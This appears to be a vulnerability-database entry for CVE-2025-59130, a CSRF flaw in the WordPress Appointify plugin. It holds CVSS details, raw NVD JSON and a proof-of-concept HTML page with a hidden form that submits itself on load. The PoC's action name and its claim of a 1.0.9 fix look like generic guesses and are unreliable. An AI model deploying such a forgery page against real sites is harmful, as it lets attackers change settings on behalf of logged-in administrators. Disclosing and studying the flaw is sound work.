Security Vulnerability Report
中文
CVE-2025-59130 CVSS 4.3 MEDIUM

CVE-2025-59130

Published: 2025-12-31 16:15:43
Last Modified: 2026-04-23 15:34:03

Description

Cross-Site Request Forgery (CSRF) vulnerability in appointify Appointify appointify allows Cross Site Request Forgery.This issue affects Appointify: from n/a through <= 1.0.8.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Appointify插件 <= 1.0.8(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-59130 - Appointify Plugin --> <!-- This PoC demonstrates the CSRF vulnerability in Appointify plugin <= 1.0.8 --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-59130</title> </head> <body> <h1>CVE-2025-59130 CSRF PoC</h1> <p>This page demonstrates the CSRF vulnerability in WordPress Appointify plugin.</p> <!-- Example: Malicious form to modify appointment settings --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="appointify_update_settings"> <input type="hidden" name="appointify_setting" value="malicious_value"> <input type="hidden" name="nonce" value=""> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <h2>Attack Description:</h2> <ul> <li><strong>Target:</strong> WordPress website with Appointify plugin <= 1.0.8</li> <li><strong>Vulnerability:</strong> Missing CSRF token validation in plugin actions</li> <li><strong>Impact:</strong> Unauthorized state-changing operations on behalf of logged-in user</li> <li><strong>Prerequisites:</strong> Target user must be logged into WordPress admin panel</li> </ul> <h2>Remediation:</h2> <ul> <li>Update Appointify plugin to version 1.0.9 or later</li> <li>Implement CSRF tokens using wp_verify_nonce() in all plugin actions</li> <li>Add nonces to all forms using wp_nonce_field()</li> </ul> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59130", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:43.440", "lastModified": "2026-04-23T15:34:02.523", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in appointify Appointify appointify allows Cross Site Request Forgery.This issue affects Appointify: from n/a through <= 1.0.8."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Appointify permite la falsificación de petición en sitios cruzados. Este problema afecta a Appointify: desde n/a hasta 1.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/appointify/vulnerability/wordpress-appointify-plugin-1-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}